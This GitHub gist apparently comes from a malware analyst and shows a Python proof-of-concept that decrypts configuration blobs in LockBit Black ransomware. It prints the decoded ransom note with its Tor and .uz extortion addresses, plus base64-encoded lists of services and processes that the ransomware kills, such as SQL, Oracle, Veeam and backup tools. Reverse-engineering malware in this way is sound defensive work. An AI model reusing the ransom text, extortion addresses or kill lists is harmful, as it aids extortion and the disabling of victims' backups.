Skip to content

Instantly share code, notes, and snippets.

@sysopfb
Created July 8, 2022 20:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sysopfb/b95ee104781f7562018e055d7e1a1c47 to your computer and use it in GitHub Desktop.
Save sysopfb/b95ee104781f7562018e055d7e1a1c47 to your computer and use it in GitHub Desktop.
lockbit black blob decoding POC

Blobs in lockbit black are decoded similar to BlackMatter but with a new LCG based on 64 bit

The init seed for the sample I REd was at the start of .pdata

POC decoding, pretty quick and dirty due to time constraints

def mul64(a1, a2):
    return(a1 * a2)

def LCG(a1):
    xkey = mul64(a1, 0x5851f42d4c957f2d) & 0xffffffffffffffff
    xkey += 0x14057b7ef767814f
    xkey = xkey & 0xffffffffffffffff
    ret = mul64(init_seed, xkey)
    ret = ret & 0xffffffffffffffff
    return(ret,xkey)

init_seed = 0x669aec516260d2fc
(xor_key, new_seed) = LCG(init_seed)

bdata = bytearray(open(sys.argv[1], 'rb').read())
out = bytearray('')

for i in range(len(bdata)/8):
    key = bytearray(struct.pack('<Q', xor_key))
    data = bdata[i*8:(i+1)*8]
    data[0] ^= key[0]
    data[1] ^= key[5]
    data[2] ^= key[1]
    data[3] ^= key[4]
    data[4] ^= key[2]
    data[5] ^= key[7]
    data[6] ^= key[3]
    data[7] ^= key[6]
    out += data
    (xor_key, new_seed) = LCG(new_seed)

key = bytearray(struct.pack('<Q', xor_key))
rest = len(bdata) - len(out)
while rest > 0:
    data = bdata[(i+1)*8:]
    data[0] ^= key[0]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[1] ^= key[5]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[2] ^= key[1]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[3] ^= key[4]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[4] ^= key[2]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[5] ^= key[7]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[6] ^= key[3]
    rest -= 1
    if rest == 0:
        out += data
        break

Two decoded objects:

>>> import aplib
>>> aplib.decompress(str(out)).do()
('LockBit Black Ransomware\r\n\r\nYour data are stolen and encrypted\r\n\r\nThe data will be published on TOR website\r\nhttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion\r\nand http://lockbitapt.uz if you do not pay the ransom\r\n\r\nYou can contact us and decrypt one file for free on these TOR sites\r\nhttp://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion\r\nhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion\r\nhttp://lockbitsupp.uz\r\n\r\nDecryption ID: %s', 358)

>>> import aplib
>>> aplib.decompress(str(out)).do()
('\xb3\x0c\x86"\xdbS\xffY]\xc0Vm(\xcd\xb9\xec\xcd\x1e\xe6\xaf\xb4\xa6\xc5z\xa1\x02\xa7\xa9)W\x8c\xfb\xb5AV\xc4\xf4\x98\x06\x93\xe0D\xa0\x04;\xb6\x80*\x8b\x13\xdd\xfb7\xb2\x84K\xa3\xadS\x94\x8b\x0egit\x84\xcb\x1f\xe2\x02\x06\xe4D\tY\x04\xcc\x91\xfa\xe53]\xa7\xe8\xb8Os\x13\xd0x\xa9ZQ\xbaLJV\x02\x93^A\xb6\xef%$]H\x8f\xa7\x7ftE\xa2XP%\xafgC\x1b\xf7~\xbc:L\xa4\x08r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x01\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x01\x00\x00\x00\x01\x00\x00(\x00\x00\x00\xa9\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfb\x01\x00\x00\xd0\x04\x00\x00\x00\x00\x00\x00\xc5\x05\x00\x00\x02\x06\x00\x00LSEKA82B8oz1eHAmNX5oJtdsQuNYac7Gp9HypsA7puE4C8tS3bjK3E5OADaVZQirlON1Lq6OAa7UJUtMNXnwB3X5ZmuSOOq3lOZmU5tYG817Ot5cO2IiurM3Ou8AAAAA\x00FarMhpsJBzmWrgzwVqvI/FKi0oIA7GuEN1mX2/WmOsLkV6qFNariy9H3zsgAAAAA\x00AA6wZwAZsMWAG0jFQBigx0AacMdAGBDJQBsgycAbaMkAHGDJQB2Qyf7L/KHxlLpKMZbiSnGX4mQAG2DLgBywywAeKM0AG4DTwBhg1YCrnsnAGHjVwBiY1QAZwNUAGTDbgBtY28AbIN0AHAjdwBwY3cAcgN3bt2tKwByo3QAbmN83eMpMwBjA4YAcMOPAHIjhwBto5wAdgOfAGJDpABqY6QAcYOlAHpjpepsuzZPFFq8AHMDxwNhe4UAZyNkAHQjTwBxI3QAZEOMAAAAA\x00cwBxAGwAAABvAHIAYQBjAGwAZQAAAG8AYwBzAHMAZAAAAGQAYgBzAG4AbQBwAAAAcwB5AG4AYwB0AGkAbQBlAAAAYQBnAG4AdABzAHYAYwAAAGkAcwBxAGwAcABsAHUAcwBzAHYAYwAAAHgAZgBzAHMAdgBjAGMAbwBuAAAAbQB5AGQAZQBzAGsAdABvAHAAcwBlAHIAdgBpAGMAZQAAAG8AYwBhAHUAdABvAHUAcABkAHMAAABlAG4AYwBzAHYAYwAAAGYAaQByAGUAZgBvAHgAAAB0AGIAaQByAGQAYwBvAG4AZgBpAGcAAABtAHkAZABlAHMAawB0AG8AcABxAG8AcwAAAG8AYwBvAG0AbQAAAGQAYgBlAG4AZwA1ADAAAABzAHEAYgBjAG8AcgBlAHMAZQByAHYAaQBjAGUAAABlAHgAYwBlAGwAAABpAG4AZgBvAHAAYQB0AGgAAABtAHMAYQBjAGMAZQBzAHMAAABtAHMAcAB1AGIAAABvAG4AZQBuAG8AdABlAAAAbwB1AHQAbABvAG8AawAAAHAAbwB3AGUAcgBwAG4AdAAAAHMAdABlAGEAbQAAAHQAaABlAGIAYQB0AAAAdABoAHUAbgBkAGUAcgBiAGkAcgBkAAAAdgBpAHMAaQBvAAAAdwBpAG4AdwBvAHIAZAAAAHcAbwByAGQAcABhAGQAAABuAG8AdABlAHAAYQBkAAAAAAA=\x00dgBzAHMAAABzAHEAbAAAAHMAdgBjACQAAABtAGUAbQB0AGEAcwAAAG0AZQBwAG8AYwBzAAAAbQBzAGUAeABjAGgAYQBuAGcAZQAAAHMAbwBwAGgAbwBzAAAAdgBlAGUAYQBtAAAAYgBhAGMAawB1AHAAAABHAHgAVgBzAHMAAABHAHgAQgBsAHIAAABHAHgARgBXAEQAAABHAHgAQwBWAEQAAABHAHgAQwBJAE0AZwByAAAAAAB=\x009eI2aT+JI/6mK24RWVph+56xzKxJz8hUMueEk2KNA/RlvDtKIiKkUHjm6X1=\x006pwsSR7mKZWKQnMxGXQl25jZyIxKoNU4JMDNs3fsBIBhzz1qN0zAcBWJmglt9fo9vmTMiYD9NMIfhmAW/A+ZwAbdq5BSAhwXVjz4VppPEQLyXrrW80zCUtIyx6QVf6W8lydJ3WNhqf34HuObh6p9ms6dXhpFiV4o2k30zqB1qJ0wb3g1zoo/b/G3xN8mlwOEwkb4Dhs6vt1lrHHZwmSEwa2jpL9g5o+6TT/yprMFOY28/MGB6P+yi2S8CJc+gKmhWme2DlbzOVqbKCYnsDKAlOWnRt0UXXKMFBvzENz2+E7BAwtGDFmWAfkB+4UjRprLHXffIBuioKPll82bsDa8SmcIPln3Sio5aORm1uqB0mkJHROi3aZ8GuA84hwrvgaepBPXS282YZiMA3Cvp4dBGT0x3K9Ra4jenpfgvjIhYRObFQq2oti3sMFnVkwtoJRmPvpZqMCYsv0AZth4YA+cHQzxOq96wcvZKuku8eJ7xg5FWG5d2G8iFT4sF3zv2je/sSGeHl4qs3soi30Ez6OWQUGGWpMVHH0q7DRyUvY7R9MieDaE49mPGNcMN+5fn92AebGr6Tawj5mK9GXuxMCPVptpZfURdIp8HOlo2gTKhZxnspY93tIMG9Ldi0fdUx2NXCoB0uMJDdprl/JM2h3+TIiXQBMhZSmucW4dDOA1EJKZsGnLTtmnWOe9pUjfRxuYjZOAbCciDOd3dFpnXAMnoWNR3+P3bnHHCUuq3VQU5muxhhbn7iXXeQqXcZRrmR6IEP06w5hR7lEiA92amlKShKA6yCpq4DrH0KtNY3kzsm+Uh8EArVk8RLD6mBfqDiEXxkajR/5h0cHkIn+5UWr7iS725/sIpqeFpmFdkFYVsWnE7up0ZkEtq2/8Oz/YGpWHsK5fLQsD3bRbejyYfpaWDPQaRR1eWnU4VW48/aQnnidfbGKsjLp4/ozyn7eGAzkB440kyYCg5scUE11OQXHSnMeQ09wiX0hhrmXVJ1AlGIcZ2Wn+AMgAk/eIVTgf0v5fJxkXLylXSQMiNXnzY9kjsBxxQYE4V2larnn5GetmnQ7wKO0niPfmiJNUHJy0sTcnbtqrocyAIj+eYQf+Mr3gRJ+QCez+7VEO0bGoQKUsMAF4lejE/F4xplSWbiiMUOE3DSJ3JA5wjW8oFgWHdzwQ617ORa/ma8kWOgK1vTFmuuvnX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